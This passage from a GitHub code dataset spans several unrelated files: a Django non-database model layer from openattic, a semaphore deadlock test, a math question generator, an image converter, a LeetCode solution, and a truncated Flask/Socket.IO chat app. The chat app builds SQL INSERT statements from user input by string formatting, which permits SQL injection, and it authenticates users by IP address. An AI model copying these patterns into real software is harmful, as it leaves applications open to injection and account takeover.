clear_ordering(self, force_empty=None):\n self._ordering = []\n\n def add_ordering(self, *keys):\n self._ordering += keys\n\n @property\n def ordering(self):\n return self._ordering\n\n @property\n def q(self):\n \"\"\":rtype: Q\"\"\"\n return self._q\n\n def set_empty(self):\n self.clear_ordering()\n self._q = None\n\n def __str__(self):\n return \"\".format(self._q, self._ordering)\n\n\nclass NodbQuerySet(QuerySet):\n\n def __init__(self, model=None, using=None, hints=None, request=None, context=None):\n \"\"\"\n model parameter needs to be optional, as QuerySet.__deepcopy__() sets self.model afterwards.\n \"\"\"\n self.model = model\n self._context = context\n self._current = 0\n self._query = NoDbQuery()\n self._result_cache = None\n self._prefetch_related_lookups = False\n\n @cached_property\n def _max(self):\n return len(self._filtered_data) - 1\n\n def _data(self):\n context = self._context if self._context else NodbManager.nodb_context\n objects = self.model.get_all_objects(context, query=self._query)\n self_pointer = LazyProperty.QuerySetPointer(objects)\n for obj in objects:\n # Because we're calling the model constructors ourselves, django thinks that\n # the objects are not in the database. We need to \"hack\" this.\n obj._state.adding = False\n obj._query_set_pointer = self_pointer\n\n return objects\n\n @cached_property\n def _filtered_data(self):\n \"\"\"\n Each Q child consists of either another Q, `attr__iexact` or `model__attr__iexact` or `attr`\n \"\"\"\n def _filter_by_modifier(keys, attr, value):\n modifier = keys[1] if len(keys) > 1 else \"exact\"\n if modifier == \"exact\":\n return attr == attr.__class__(value)\n elif modifier == \"istartswith\":\n return attr.startswith(value)\n elif modifier == \"icontains\":\n return value in attr\n elif modifier == \"in\":\n return attr in value\n else:\n raise ValueError('Unsupported Modifier {}.'.format(modifier))\n\n def filter_impl(keys, value, obj):\n assert keys\n\n if isinstance(obj, dict):\n if keys[0] not in obj:\n raise AttributeError(\n 'Attribute {} does not exist in dict'.format(keys[0]))\n elif not hasattr(obj, keys[0]):\n raise AttributeError(\n 'Attribute {} does not exist for {}'.format(keys[0], obj.__class__))\n\n attr = obj[keys[0]] if isinstance(obj, dict) else getattr(obj, keys[0], None)\n\n if attr is None:\n return value is None\n elif isinstance(attr, list):\n if isinstance(attr[0], basestring):\n return _filter_by_modifier(keys, attr, value)\n return reduce(operator.or_, [filter_impl(keys[1:], value, e) for e in attr], False)\n elif isinstance(attr, models.Model) or isinstance(attr, dict):\n return filter_impl(keys[1:], value, attr)\n else:\n return _filter_by_modifier(keys, attr, value)\n\n def filter_one_q(q, obj):\n \"\"\"\n :type q: Q\n :type obj: NodbModel\n :rtype: bool\n \"\"\"\n def negate(res):\n return not res if q.negated else res\n\n if q is None:\n return True\n elif isinstance(q, tuple):\n return filter_impl(q[0].split('__'), q[1], obj)\n elif q.connector == \"AND\":\n return negate(reduce(lambda l, r: l and filter_one_q(r, obj), q.children, True))\n else:\n children = {c for c in q.children if not isinstance(c, Q) or c.children}\n return negate(reduce(lambda l, r: l or filter_one_q(r, obj), children, False))\n\n filtered = [obj for obj in self._data()\n if filter_one_q(self._query.q, obj)]\n\n for order_key in self.query.ordering[::-1]:\n if order_key.startswith(\"-\"):\n order_key = order_key[1:]\n filtered.sort(key=lambda obj: getattr(obj, order_key), reverse=True)\n else:\n filtered.sort(key=lambda obj: getattr(obj, order_key))\n\n return filtered\n\n def __iter__(self):\n self._current = 0\n return self\n\n def __len__(self):\n return len(self._filtered_data)\n\n def next(self):\n if self._current > self._max:\n raise StopIteration\n else:\n self._current += 1\n return self._filtered_data[self._current - 1]\n\n def __getitem__(self, index):\n return self._filtered_data[index]\n\n def _clone(self, klass=None, setup=False, **kwargs):\n my_clone = NodbQuerySet(self.model, context=self._context)\n my_clone._query = self._query.clone()\n return my_clone\n\n def __deepcopy__(self, memo):\n return super(NodbQuerySet, self).__deepcopy__(memo)\n\n def count(self):\n return len(self._filtered_data)\n\n def get(self, **kwargs):\n \"\"\"Return a single object filtered by kwargs.\"\"\"\n filtered_data = self.filter(**kwargs)\n\n # Thankfully copied from\n # https://github.com/django/django/blob/1.7/django/db/models/query.py#L351\n num = len(filtered_data)\n if num == 1:\n return filtered_data[0]\n if not num:\n raise self.model.DoesNotExist(\n '{} matching query \"{}\" does not exist.'.format(self.model._meta.object_name,\n filtered_data.query))\n raise self.model.MultipleObjectsReturned(\n \"get() returned more than one %s -- it returned %s!\" % (\n self.model._meta.object_name,\n num\n )\n )\n\n def exists(self):\n return bool(self._filtered_data)\n\n @property\n def query(self):\n return self._query\n\n def filter(self, *args, **kwargs):\n return super(NodbQuerySet, self).filter(*args, **kwargs)\n\n def all(self):\n return super(NodbQuerySet, self).all()\n\n def __str__(self):\n return super(NodbQuerySet, self).__str__()\n\n def __repr__(self):\n return super(NodbQuerySet, self).__repr__()\n\n def __nonzero__(self):\n return bool(len(self))\n\n def iterator(self):\n logger.warning(\n '{}.iterator should only be access when running tests.'.format(self.__class__))\n return []\n\n _db = not None # Make Django 1.8 happy.\n\n\nif django.VERSION[:2] == (1, 6):\n from django.db.models.manager import Manager\n base_manager_class = Manager\n\nelif django.VERSION[:2] == (1, 7):\n from django.db.models.manager import BaseManager\n base_manager_class = BaseManager.from_queryset(NodbQuerySet)\n\nelif django.VERSION[:2] >= (1, 8):\n from django.db.models.manager import BaseManager, Manager\n\n class base_manager_class(BaseManager.from_queryset(NodbQuerySet), Manager):\n \"\"\"in DRF 3, rest_framework.relations.RelatedField#get_queryset checks:\n\n >>> isinstance(queryset, Manager)\n\n This is unfortunate, but we have to inherent from `Manager`, too!\n \"\"\"\n pass\n\n\nclass NodbManager(base_manager_class):\n\n use_for_related_fields = True\n nodb_context = None\n\n @classmethod\n def set_nodb_context(cls, context):\n cls.nodb_context = context\n\n def get_queryset(self):\n if django.VERSION[:2] == (1, 6):\n return NodbQuerySet(self.model, using=self._db, context=NodbManager.nodb_context)\n else:\n return self._queryset_class(self.model, using=self._db, hints=self._hints,\n context=NodbManager.nodb_context)\n\n\nclass LazyProperty(object):\n \"\"\"\n See also: django.db.models.query_utils.DeferredAttribute\n\n Internally used by @bulk_attribute_setter().\n \"\"\"\n class QuerySetPointer(object):\n def __init__(self, target):\n self.target = target\n\n def __init__(self, field_name, eval_func, catch_exceptions, field_names):\n self.field_name = field_name\n self.eval_func = eval_func\n self.catch_exceptions = catch_exceptions\n self.field_names = field_names\n\n def __get__(self, instance, owner=None):\n \"\"\"\n runs eval_func which fills some lazy properties.\n \"\"\"\n if hasattr(instance, '_query_set_pointer'):\n query_set = instance._query_set_pointer.target\n else:\n # Fallback. Needed for objects without a queryset.\n query_set = [instance]\n if self.field_name in instance.__dict__:\n return instance.__dict__[self.field_name]\n\n if self.catch_exceptions is None:\n self.eval_func(instance, query_set, self.field_names)\n else:\n try:\n self.eval_func(instance, query_set, self.field_names)\n except self.catch_exceptions as e:\n logger.exception('failed to populate Field \"{}\" of {} ({})'\n .format(self.field_name, unicode(instance), instance.__class__))\n fields = instance.__class__.make_model_args({}, fields_force_none=self.field_names)\n for field_name, value in fields.items():\n setattr(instance, field_name, value)\n\n if self.field_name not in instance.__dict__:\n raise KeyError(\n 'LazyProperty: {} did not set {} of {}'.format(self.eval_func, self.field_name,\n instance))\n return instance.__dict__[self.field_name]\n\n def __set__(self, instance, value):\n \"\"\"\n Deferred loading attributes can be set normally (which means there will\n never be a database lookup involved.\n \"\"\"\n instance.__dict__[self.field_name] = value\n\n\ndef bulk_attribute_setter(field_names, catch_exceptions=None):\n \"\"\"\n The idea @behind bulk_attribute_setter is to delay expensive calls to librados, until someone\n really needs the information gathered in this call. If the attribute is never used, the call\n will never be executed. In general, this is called lazy execution.\n\n Before, NodbQuerySet called self.model.get_all_objects to generate a list of objects. The\n implementations of get_all_objects were calling the librados commands to fill all attributes,\n even if they were never accessed.\n\n Because a field may never be accessed, this can generate better performance than caching,\n especially if the cache is cold.\n\n The bulk_attribute_setter decorator can be used like so:\n >>> class MyModel(NodbModel):\n >>> my_field = models.IntegerField()\n >>>\n >>> @bulk_attribute_setter(['my_field'])\n >>> def set_my_field(self, objs, field_names):\n >>> self.my_field = 42\n\n Keep in mind, that you can set the my_field attribute on all objects, not just self.\n\n The decorator modifies the model to look like this:\n >>> def set_my_field(self, objs):\n >>> self.my_field = 42\n >>>\n >>> class MyModel(NodbModel):\n >>> my_field = models.IntegerField()\n >>> set_my_field = LazyPropertyContributor(['my_field'], set_my_field)\n\n A LazyPropertyContributor property implements the contribute_to_class method, which modifies\n the model itself to look like so:\n >>> class MyModel(NodbModel):\n >>> my_field = LazyProperty('my_field', set_my_field)\n\n The my_field field is not overwritten, because the fields are already moved into the _meta class\n at this point. If someone then accesses the my_field attribute, LazyProperty.__get__ is called,\n which then calls set_my_field to set the field, as if one had written:\n >>> instances = MyModel.objects.all()\n >>> set_my_field(instances[0], instances)\n >>> assert instances[0].my_field == 42\n\n For example, get_all_objects generates a QuerySet like this:\n\n id\tname\t disk_usage\n 0\t'foo' LazyProperty('disk_usage')\n 1\t'bar'\t LazyProperty('disk_usage')\n\n When accessing bar.disk_usage, LazyProperty calls `ceph df` and fills the queryset like so:\n\n id\tname\tdisk_usage\n 0\t'foo' 1MB\n 1\t'bar' \t2MB\n\n :type field_names: list[str]\n :param catch_exceptions: Exceptions that will be caught. In case of an exception, all\n `field_names` will be set to None.\n :type catch_exceptions: exceptions.Exception | tuple[exceptions.Exception]\n \"\"\"\n\n if not len(field_names):\n raise ValueError('`field_names` must not be empty.')\n\n class LazyPropertyContributor(object):\n def __init__(self, field_names, func):\n self.field_names = field_names\n self.func = func\n\n def contribute_to_class(self, cls, name, virtual_only=False):\n for name in self.field_names:\n setattr(cls, name, LazyProperty(name, self.func, catch_exceptions,\n self.field_names))\n\n def decorator(func):\n return LazyPropertyContributor(field_names, func)\n\n return decorator\n\n\nclass NodbModel(models.Model):\n\n objects = NodbManager()\n\n class Meta:\n # Needs to be true to be able to create the necessary database tables by using Django\n # migrations. The table is necessary to be able to use Django model relations.\n managed = True\n abstract = True\n\n @staticmethod\n def get_all_objects(context, query):\n msg = 'Every NodbModel must implement its own get_all_objects() method.'\n raise NotImplementedError(msg)\n\n def get_modified_fields(self, update_fields=None, **kwargs):\n \"\"\"\n Returns a dict of fields, which have changed. There are two known problems:\n\n 1. There is a race between get_modified_fields and the call to this.save()\n 2. A type change, e.g. str and unicode is not handled.\n\n :param update_fields: restrict the search for updated fields to update_fields.\n :param kwargs: used to retrieve the original. default: `pk`\n :rtype: tuple[dict[str, Any], T <= NodbModel]\n :return: A tuple consisting of the diff and the original model instance\n \"\"\"\n if not kwargs:\n kwargs['pk'] = self.pk\n\n field_names = [f.attname for f in self.__class__._meta.fields]\n if update_fields is None:\n update_fields = field_names\n else:\n assert not (set(update_fields) - set(field_names))\n\n fields = [f for f in self.__class__._meta.fields if f.attname in update_fields]\n original = self.__class__.objects.get(**kwargs)\n return {\n field.attname: getattr(self, field.attname, None)\n for field\n in fields\n if field.editable and getattr(self, field.attname, None) != getattr(original,\n field.attname, None)\n }, original\n\n def attribute_is_unevaluated_lazy_property(self, attr):\n \"\"\"\n :rtype: bool\n \"\"\"\n if attr not in self.__class__.__dict__:\n return False\n prop = self.__class__.__dict__[attr]\n if not isinstance(prop, LazyProperty):\n return False\n return attr not in self.__dict__\n\n def set_read_only_fields(self, obj, include_pk=True):\n \"\"\"\n .. example::\n >>> insert = self.id is None\n >>> diff, original = self.get_modified_fields(name=self.name) if insert\n >>> else self.get_modified_fields()\n >>> if not insert:\n >>> self.set_read_only_fields()\n \"\"\"\n if include_pk:\n self.pk = obj.pk\n\n for field in self.__class__._meta.fields:\n if (not field.editable\n and not self.attribute_is_unevaluated_lazy_property(field.attname)\n and hasattr(obj, field.attname)\n and getattr(self, field.attname, None) != getattr(obj, field.attname)):\n setattr(self, field.attname, getattr(obj, field.attname))\n\n @classmethod\n def make_model_args(cls, json_result, fields_force_none=None):\n \"\"\"\n TODO: fields_force_none could be auto generated by the field names.\n\n :type json_result: dict[str, Any]\n :type fields_force_none: list[str]\n :rtype: dict[str, Any]\n \"\"\"\n def get_val_from_json(key):\n if key in json_result:\n return json_result[key]\n elif key.replace('_', '-') in json_result:\n # '-' is not supported for field names, but used by ceph.\n return json_result[key.replace('_', '-')]\n raise AttributeError\n\n def handle_field(field):\n \"\"\":rtype: list[tuple[str, Any]]\"\"\"\n try:\n val = get_val_from_json(field.attname)\n except AttributeError:\n return []\n\n if val is None and not field.null:\n return []\n\n if isinstance(field, models.ForeignKey):\n return [(field.attname, val)]\n\n try:\n python_val = field.to_python(val)\n except ValidationError as e:\n return []\n\n return [(field.attname, python_val)]\n\n model_args = dict(\n itertools.chain.from_iterable([handle_field(field) for field in cls._meta.fields])\n )\n for name in fields_force_none or []:\n if name not in model_args:\n model_args[name] = None\n return model_args\n\n def __init__(self, *args, **kwargs):\n # super(NodbModel, self).__init__(*args, **kwargs)\n self._state = ModelState()\n\n self.__dict__.update(kwargs)\n\n # We need to trigger the __set__ method of related fields\n for (key, value) in kwargs.iteritems():\n if key in self.__class__.__dict__ and \\\n isinstance(self.__class__.__dict__[key], ReverseSingleRelatedObjectDescriptor):\n setattr(self, key, value)\n\n for field in self._meta.concrete_fields:\n is_related_field = isinstance(field.rel, ForeignObjectRel)\n\n # set defaults:\n if not is_related_field \\\n and not self.attribute_is_unevaluated_lazy_property(field.name) \\\n and not hasattr(self, field.name):\n setattr(self, field.name, field.get_default())\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n \"\"\"\n This base implementation does nothing, except telling django that self is now successfully\n inserted.\n \"\"\"\n self._state.adding = False\n\n\nclass JsonField(Field):\n empty_strings_allowed = False\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n :param base_type: list | dict\n :type base_type: type\n :rtype: JsonField[T]\n \"\"\"\n self.base_type = kwargs['base_type']\n del kwargs['base_type']\n super(JsonField, self).__init__(*args, **kwargs)\n\n def to_python(self, value):\n \"\"\":rtype: T\"\"\"\n def check_base_type(val):\n if not isinstance(val, self.base_type):\n raise exceptions.ValidationError(\n \"invalid JSON type. Got {}, expected {}\".format(type(parsed), self.base_type),\n code='invalid',\n params={'value': value},\n )\n return val\n\n if value is None:\n return None\n if isinstance(value, self.base_type):\n return value\n if not value and self.null:\n return None\n try:\n parsed = json.loads(value)\n return check_base_type(parsed)\n except (ValueError, TypeError) as _:\n try:\n # Evil hack to support PUT requests to the Browsable API of the\n # django-rest-framework as we cannot determine if restapi.JsonField.tonative() is\n # called for json or for rendering the form.\n obj = ast.literal_eval(value)\n return check_base_type(obj)\n except ValueError:\n raise exceptions.ValidationError(\n \"invalid JSON\",\n code='invalid',\n params={'value': value},\n )\n\n def deconstruct(self):\n name, path, args, kwargs = super(JsonField, self).deconstruct()\n kwargs['base_type'] = self.base_type\n return name, path, args, kwargs\n\n @property\n def empty_values(self):\n return [u'', [], {}]\n\ntry:\n from django.db.migrations import AlterField\n\n class AlterNoDBField(AlterField):\n def database_forwards(self, app_label, schema_editor, from_state, to_state):\n pass\n\n def describe(self):\n return \"Alter NoDB field {} on {}\".format(self.name, self.model_name)\nexcept ImportError:\n # Django 1.6 does not have an AlterField, but it also doesn't use the Django 1.7+ migrations, so\n # no need to do anything here.\n pass\n","repo_name":"openattic/openattic","sub_path":"backend/nodb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":22356,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"21639496341","text":"import checker\nfrom MCLock import Semaphore\nfrom MCThread import MCThread\n\n# class Mutex:\n#single writer assumed\n \n# Rcount = 0 \n# Wmutex = Semaphore(\"WM\",1) \n# Rmutex = Semaphore(\"RM\", 1) \n# File = Semaphore(\"FILE\", 1) \n# Wirte = Semaphore(\"Write\",1)\n\n# @MCThread\n# def t1(self):\n# self.Wirte.P()\n# self.Rmutex.P()\n# if self.Rcount == 0:\n# self.File.P()\n# self.Rcount += 1\n# self.Rmutex.V()\n# self.Wirte.V()\n# self.Rmutex.P()\n# self.Rcount -= 1\n# if self.Rcount == 0:\n# self.File.V()\n# self.Rmutex.V()\n\n# @MCThread\n# def t2(self):\n# self.Wmutex.P()\n# self.Wirte.P()\n# self.Wmutex.V()\n# self.File.P()\n# self.File.V()\n# self.Wmutex.P()\n# self.Wirte.V()\n# self.Wmutex.V()\n\n\nclass Mutex:\n lock1 = Semaphore(\"lk1\", 1)\n lock2 = Semaphore(\"lk2\", 1)\n\n @MCThread\n def t1(self):\n while True:\n self.lock1.P()\n self.lock2.P()\n self.lock2.V()\n self.lock1.V()\n\n @MCThread\n def t2(self):\n while True:\n self.lock2.P()\n self.lock1.P()\n self.lock1.V()\n self.lock2.V()\n\nchecker.check()","repo_name":"Usernamehaha2018/design","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5005666082","text":"import random\nimport operator\n\n# What is the third biggest value in -0.25, 403, -1?\n# Which is the biggest value? (a) -2/79 (b) 1 (c) 6/17\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\nno_of_samples = 1000000\narr = ['biggest', 'smallest']\nqn_arr = ['','','second','third','fourth','fifth']\nabcde = ['(a)','(b)','(c)','(d)','(e)']\n\ndef num_gen():\n types = random.randint(1,20)\n if types<=8:\n return random.randint(-100, 100),0\n elif types<=14:\n num = random.randint(-100,100)\n return round(num/100,2),0\n else:\n num = random.randint(-10,10)\n den = random.randint(1,20)\n return num, den\n\nfor j in range(no_of_samples):\n no_of_nums = random.randint(3,5)\n qn_word = random.randint(1,no_of_nums)\n big_small = random.randint(0,1)\n \n nums = []\n a_arr = []\n b_arr = []\n temp = [] \n count = 0 \n while count < no_of_nums:\n a, b = num_gen()\n a_arr.append(a)\n b_arr.append(b)\n if b==0:\n if a in temp:\n continue\n else:\n temp.append(a)\n count+=1\n else:\n if round(a/b,2) in temp:\n continue\n else:\n temp.append(round(a/b,2))\n count+=1\n\n types = random.randint(1,6)\n if types!=6:\n if qn_word!=1:\n q = \"Which is the \"+qn_arr[qn_word]+\" \"+arr[big_small]+\" value? \"\n else:\n q = \"Which is the \"+arr[big_small]+\" value? \" \n for i in range(no_of_nums):\n q = q + abcde[i] + \" \"\n if b_arr[i]==0:\n q = q + str(a_arr[i])\n else:\n q = q + str(a_arr[i])+\"/\"+str(b_arr[i])\n if i!=no_of_nums-1:\n q = q + \" \"\n q = q + \"\\n\"\n else:\n if qn_word!=1:\n q = \"What is the \"+qn_arr[qn_word]+\" \"+arr[big_small]+\" value in \"\n else:\n q = \"What is the \"+arr[big_small]+\" value in \"\n for i in range(no_of_nums):\n if b_arr[i]==0:\n q = q + str(a_arr[i])\n else:\n q = q + str(a_arr[i])+\"/\"+str(b_arr[i])\n if i!=no_of_nums-1:\n q = q + \", \"\n else:\n q = q + \"?\"\n q = q + \"\\n\"\n\n an = \"\"\n enumerate_object = enumerate(temp)\n if big_small==0:\n sorted_pairs = sorted(enumerate_object, key=operator.itemgetter(1), reverse=True) \n else:\n sorted_pairs = sorted(enumerate_object, key=operator.itemgetter(1))\n sorted_indices = []\n sorted_ele = []\n for index, element in sorted_pairs:\n sorted_indices.append(index)\n sorted_ele.append(element)\n if types == 6:\n if b_arr[sorted_indices[qn_word-1]]==0:\n an = str(a_arr[sorted_indices[qn_word-1]])\n else:\n an = str(a_arr[sorted_indices[qn_word-1]])+\"/\"+str(b_arr[sorted_indices[qn_word-1]])\n else:\n an = abcde[sorted_indices[qn_word-1]]\n qns.write(q)\n ans.write(an+\"\\n\")\nqns.close()\nans.close()","repo_name":"misterpawan/scimat2","sub_path":"mathematics/NumberTheory/kthbiggest/kthbiggest.py","file_name":"kthbiggest.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"38693235625","text":"import PIL.Image\n# Adding the GUI interface\n#from tkinter import *\nimport os\nimport cv2\n \n\nimg_path = \"\"\n\nsave_folder = \"G:\\\\Nishat_DLC\\\\MPII-human-nishat-2023-02-09\\\\labeled-data\\MPIIpng\"\n\n# To convert the image From JPG to PNG\nfor dir in os.listdir(img_path):\n if dir == '.DS_Store':\n continue\n else:\n currentpath = img_path + dir + \"/\"\n altpath = dir + \"/\"\n for filename in os.listdir(img_path):\n if filename == '.DS_Store':\n continue\n else:\n img = cv2.imread(currentpath + filename, cv2.IMREAD_UNCHANGED)\n cv2.imwrite(save_folder + altpath + filename + \".png\", img)\n\t ","repo_name":"nishata24/Training-Image-PreProcessing","sub_path":"HELLO/jpg_to_png.py","file_name":"jpg_to_png.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15345972422","text":"class Solution:\n def partition(self, s: str) -> List[List[str]]:\n ans = []\n temp = []\n\n def dfs(i):\n if i >= len(s):\n ans.append(temp.copy())\n return\n\n for n in range(i, len(s)):\n if self.isPalindrome(s, i, n):\n temp.append(s[i: n + 1])\n dfs(n + 1)\n temp.pop()\n dfs(0)\n return ans\n def isPalindrome(self, s, i , n):\n a = s[i : n + 1]\n return a == a[::-1]","repo_name":"GARlMAN/leetcode","sub_path":"0131-palindrome-partitioning/0131-palindrome-partitioning.py","file_name":"0131-palindrome-partitioning.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11924383883","text":"from concurrent.futures import thread\r\nfrom pickle import TRUE\r\nfrom urllib import request\r\nimport flask\r\nfrom flask_socketio import SocketIO, emit, join_room\r\nimport DBconntctor\r\nimport functions\r\nimport os\r\nimport ssl\r\nfrom waitress import serve # Waitressをインポート\r\n\r\n#テキストチャットの通知に使うルーム(キーがユーザーネームで値がルーム番号)\r\nrooms = dict()\r\n#現在のルーム番号の最大値が格納される\r\nroom_no = 0\r\n#グループのテキストチャット用\r\nrooms_group = dict()\r\nroom_no_group = 1000\r\n#RTC用\r\nrooms_for_rtc = dict()\r\nroom_no_rtc = 2000\r\napp = flask.Flask(__name__)\r\nasyncMode = \"threading\"\r\nsocketio = SocketIO(app, cors_allowed_origins=\"*\", async_mode=asyncMode, logger=True, engineio_logger=True)\r\ncontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)\r\ncontext.load_cert_chain('Python/certificate/cert.pem','Python/certificate/privkey.pem')\r\nLogin_users = {\"exampleip\":\"exampleuser\"}\r\n\r\n\r\n###########socketio##############\r\n#section for socketio in text chat\r\n#messages for 1 on 1\r\n@socketio.on('join')\r\ndef handle_join(postTo,postFrom):\r\n print(postTo,postFrom)\r\n global room_no\r\n global rooms\r\n for key in rooms:\r\n if (key == postFrom) or (key == postTo):\r\n print(rooms[key])\r\n join_room(rooms[key])\r\n emit('send_room_no',rooms[key])\r\n return \r\n room_no = room_no + 1\r\n rooms[postFrom] = room_no\r\n rooms[postTo] = room_no\r\n join_room(room_no)\r\n emit('send_room_no',room_no)\r\n\r\n@socketio.on('send')\r\ndef send(postFrom,postTo,content,roomNo):\r\n stmt = 'INSERT INTO messages (postFrom,postTo,content) VALUE (\"{}\",\"{}\",\"{}\")'.format(postFrom,postTo,content)\r\n DBconntctor.Insert_to_DB(stmt)\r\n emit('server response', room=roomNo)\r\n\r\n#messages for groups\r\n@socketio.on('join_room')\r\ndef handle_join_room(group_id):\r\n global room_no_group\r\n global rooms_group\r\n for key in rooms_group:\r\n if key == group_id:\r\n print(rooms_group[key])\r\n join_room(rooms_group[key])\r\n emit('send_room_no',rooms_group[key])\r\n return\r\n room_no_group = room_no_group + 1\r\n rooms_group[group_id] = room_no_group\r\n join_room(rooms_group[group_id])\r\n emit('send_room_no',room_no_group)\r\n\r\n@socketio.on('send_group')\r\ndef sendGroup(sendername,groupid,content,roomNo):\r\n stmt = 'INSERT INTO groups_massages (groupID,content,sendername) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupid,content,sendername)\r\n DBconntctor.Insert_to_DB(stmt)\r\n emit('server response',room=roomNo)\r\n###########socketio end##############\r\n\r\n###########socketio signaling###########\r\n#section for webRTC signaling\r\n@socketio.on('connect_rtc')\r\ndef handle_rtc_connect(connectFrom,connectTo):\r\n global room_no_rtc\r\n global rooms_for_rtc\r\n if connectFrom not in rooms_for_rtc:\r\n room_no_rtc = room_no_rtc + 1\r\n rooms_for_rtc[connectFrom] = room_no_rtc\r\n if connectTo not in rooms_for_rtc:\r\n room_no_rtc = room_no_rtc + 1\r\n rooms_for_rtc[connectTo] = room_no_rtc\r\n print('connected')\r\n join_room(rooms_for_rtc[connectFrom])\r\n\r\n@socketio.on('offer')\r\ndef handle_offer(data,connectTo):\r\n emit('offer_data', data, room=rooms_for_rtc[connectTo])\r\n\r\n@socketio.on('answer')\r\ndef handle_answer(data,connectTo):\r\n emit('answer_data', data, room=rooms_for_rtc[connectTo])\r\n\r\n@socketio.on('candidate')\r\ndef handle_candidate(data,connectTo):\r\n emit('candidate_data', data, room=rooms_for_rtc[connectTo])\r\n\r\n@socketio.on('share_screen')\r\ndef handle_share_screen(connectTo):\r\n emit('share_screen',room=room_no_rtc[connectTo])\r\n###########socketio signaling end####################\r\n\r\n\r\n###########show voice chat page###################\r\n@app.route('/voiceChat',methods=['GET'])\r\ndef videoChat():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n \r\n #get username and friend name you wanna to connect\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n connectTo = flask.request.args.get('connectTo')\r\n\r\n #check if user and connectTo is friend\r\n if functions.check_friend(username,connectTo) == False:\r\n return flask.redirect('/')\r\n\r\n return flask.render_template('vc_room.html', connectTo = connectTo, connectFrom = username)\r\n\r\n###########show signin page##############\r\n@app.route('/',methods =['GET','POST'])\r\ndef main():\r\n if flask.request.method == \"GET\":\r\n props = {'title': 'Index', 'msg': 'MessagingCenter'}\r\n return flask.render_template('index.html', props=props)\r\n if flask.request.method == 'POST':\r\n #ユーザ名とパスワードを確認\r\n username = flask.request.form['username']\r\n password = flask.request.form['password']\r\n\r\n #現在のユーザから一旦ログアウト\r\n userip = flask.request.remote_addr\r\n functions.LogoutFromUser(userip)\r\n #ログイン\r\n if functions.CheckSignin(username,password,flask.request.remote_addr) == True:\r\n return flask.redirect('/message/home')\r\n props = {'title': 'Index', 'msg': '入力間違いです'}\r\n return flask.render_template('index.html', props=props)\r\n\r\n\r\n###########show signup page##############\r\n@app.route('/signup', methods=[\"POST\",\"GET\"])\r\ndef signup():\r\n if flask.request.method == \"POST\":\r\n username = flask.request.form['username']\r\n password = flask.request.form['password']\r\n #パスワードをハッシュ化して安全性を向上\r\n password = functions.hash_pass(password)\r\n stmt = 'SELECT EXISTS(SELECT * FROM users WHERE name = %s)'\r\n param = (username,)\r\n #すでにユーザ名が登録済みか確認\r\n if DBconntctor.Select_from_DB(stmt,param)[0][0]==1:\r\n return flask.render_template('signup.html',props = \"Username already exists\")\r\n #ユーザをデータベースに登録\r\n stmt = 'INSERT INTO users (name,passWord) VALUE (\"{}\",\"{}\")'.format(username,password)\r\n DBconntctor.Insert_to_DB(stmt)\r\n #ユーザ情報をデータベースに登録\r\n stmt = 'INSERT INTO user_info (userId) VALUE (\"{}\")'.format(username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/')\r\n if flask.request.method == \"GET\":\r\n return flask.render_template('signup.html',props = \"アカウント登録\")\r\n\r\n\r\n###########log out##############\r\n@app.route('/logout',methods = [\"GET\"])\r\ndef logout():\r\n userip = flask.request.remote_addr\r\n functions.LogoutFromUser(userip)\r\n return flask.redirect('/')\r\n\r\n\r\n###########show user home page##############\r\n@app.route('/message/home', methods = [\"GET\"])\r\ndef msghome():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n \r\n #get all friends\r\n stmt = 'SELECT * FROM user_friends WHERE requestedId = %s AND approved = \"1\"'\r\n param = (username,)\r\n fromMessages = DBconntctor.Select_from_DB(stmt,param)\r\n #get friend requests\r\n stmt = 'SELECT * FROM user_friends WHERE requestedId = %s AND requested = \"1\" AND approved = \"0\"'\r\n param = (username,)\r\n \r\n friendrequests = DBconntctor.Select_from_DB(stmt,param)\r\n print(friendrequests)\r\n props = {'title': 'メッセージセンター', 'msg': 'メッセージセンター'}\r\n return flask.render_template('msghome.html', props=props ,username = username,fromMessages = fromMessages,friendrequests = friendrequests)\r\n\r\n###########show message page##############\r\n@app.route(\"/message/get\", methods=[\"POST\",\"GET\"])\r\ndef get_msg():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n\r\n #if user is sending message\r\n if flask.request.method == \"POST\":\r\n content = flask.request.form[\"content\"]\r\n postTo = flask.request.form[\"postTo\"]\r\n postFrom = postTo\r\n\r\n #フレンドかどうかの判定\r\n if(functions.check_friend(username,postTo) == False):\r\n return flask.redirect('/message/home')\r\n\r\n #check if message is empty or space\r\n if(content == \"\" or content.isspace()):\r\n return flask.redirect('/message/get?postFrom={}'.format(postFrom))\r\n \r\n #send message to user\r\n stmt = 'INSERT INTO messages (postFrom,postTo,content) VALUE (\"{}\",\"{}\",\"{}\")'.format(username,postTo,content)\r\n DBconntctor.Insert_to_DB(stmt)\r\n\r\n #get messages from user\r\n stmt = 'SELECT * FROM messages WHERE (postFrom = %s AND postTo = %s) OR (postFrom = %s AND postTo = %s)'\r\n param = (postFrom,username,username,postFrom)\r\n Messages = DBconntctor.Select_from_DB(stmt,param)\r\n\r\n return 